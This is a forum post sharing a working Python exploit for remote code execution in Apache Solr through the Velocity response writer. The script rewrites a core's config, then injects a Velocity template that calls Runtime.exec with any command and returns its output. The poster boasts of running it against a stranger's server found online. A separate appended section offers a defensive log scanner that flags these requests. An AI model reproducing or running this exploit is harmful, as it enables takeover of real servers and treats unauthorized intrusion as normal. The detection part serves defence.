[hack tools] Apache Solr latest remote code execution vulnerability verification script
Posted 黑客信徒
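I went back to my hometown last weekend. A remote code execution vulnerability in Apache Solr was disclosed, and I have just written a verification program for it. The code: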
#coding:utf-8
import requests
import sys

def modify_core():
    data = '{"update-queryresponsewriter":{"startup":"lazy","name":"velocity","class":"solr.VelocityResponseWriter","template.base.dir":"","solr.resource.loader.enabled":"true","params.resource.loader.enabled": "true"}}'
    html = requests.post(url = target_config_url,data = data)
    if html.status_code == 200 and 'It is likely to change in the future' in html.text.encode('utf-8'):
        return True
    else:
        return False

def exploit(command):
    host = target_config_url.split('/config')[0]
    exp = host + '/select?q=1&&wt=velocity&v.template=custom&v.template.custom=%23set($x=%27%27)+%23set($rt=$x.class.forName(%27java.lang.Runtime%27))+%23set($chr=$x.class.forName(%27java.lang.Character%27))+%23set($str=$x.class.forName(%27java.lang.String%27))+%23set($ex=$rt.getRuntime().exec(%27'+command+'%27))+$ex.waitFor()+%23set($out=$ex.getInputStream())+%23foreach($i+in+[1..$out.available()])$str.valueOf($chr.toChars($out.read()))%23end'
    html = requests.get(url = exp)
    print '\n'
    print html.text.encode('utf-8').strip()

if __name__ == '__main__':
    if len(sys.argv) != 3:
        print '\nusage: python solr_exp.py http://192.168.6.6:8983/solr/mail/config/ "whoami"'
        sys.exit()
    else:
        target_config_url = sys.argv[1]
        if modify_core():
            exploit(sys.argv[2])
        else:
            print '\nplease check target core url'
I found a foreigner's target server online and tested it; arbitrary commands can be executed directly.
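On the defensive side, both requests the script sends are visible in HTTP access logs: a POST to a core's `/config` endpoint, then a `/select` request with `wt=velocity` and the template body in a `v.template.*` parameter. The following is an added example, not part of the original post, that flags those two patterns; the NCSA-style log format, the `demo` core name, the addresses and the finding labels are constructed assumptions.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Request field of an NCSA-style access-log line (assumed log format).
REQ = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')

def classify(line):
    """Return finding labels for one access-log line."""
    m = REQ.search(line)
    if not m:
        return []
    parts = urlsplit(m.group("target"))
    params = parse_qs(parts.query)  # also URL-decodes %23, %27 and '+'
    findings = []
    # Step 1 of the script: a write to a core's Config API endpoint.
    if m.group("method") == "POST" and re.fullmatch(r"/solr/[^/]+/config/?", parts.path):
        findings.append("config-api-write")
    # Step 2: the query selects the Velocity response writer ...
    if "velocity" in (v.lower() for v in params.get("wt", [])):
        findings.append("velocity-writer")
        # ... and carries the template body in a v.template.<name> parameter.
        inline = [k for k in params if k.startswith("v.template.")]
        if inline:
            findings.append("inline-template")
            body = " ".join(v for k in inline for v in params[k])
            if re.search(r"java\.lang\.|getRuntime|\.exec\(", body):
                findings.append("java-reflection")
    return findings

def scan(lines):
    """Group findings by client address (first field of each line)."""
    by_client = {}
    for line in lines:
        hits = classify(line)
        if hits:
            by_client.setdefault(line.split(" ", 1)[0], set()).update(hits)
    return by_client

# Constructed sample lines: documentation addresses, made-up core "demo".
SAMPLE = [
    '198.51.100.7 - - [01/Jan/2020:10:00:00 +0000] "POST /solr/demo/config HTTP/1.1" 200 312',
    '198.51.100.7 - - [01/Jan/2020:10:00:02 +0000] "GET /solr/demo/select?q=1&&wt=velocity&v.template=custom&v.template.custom=%23set($x=%27%27)+%23set($rt=$x.class.forName(%27java.lang.Runtime%27)) HTTP/1.1" 200 48',
    '203.0.113.9 - - [01/Jan/2020:10:01:00 +0000] "GET /solr/demo/select?q=title:solr&wt=json HTTP/1.1" 200 900',
]

if __name__ == "__main__":
    for client, hits in scan(SAMPLE).items():
        print(client, sorted(hits))
```

Access logs do not record POST bodies, so `config-api-write` only says that a core's configuration was written to; a client that shows it together with `inline-template` is the combination worth investigating.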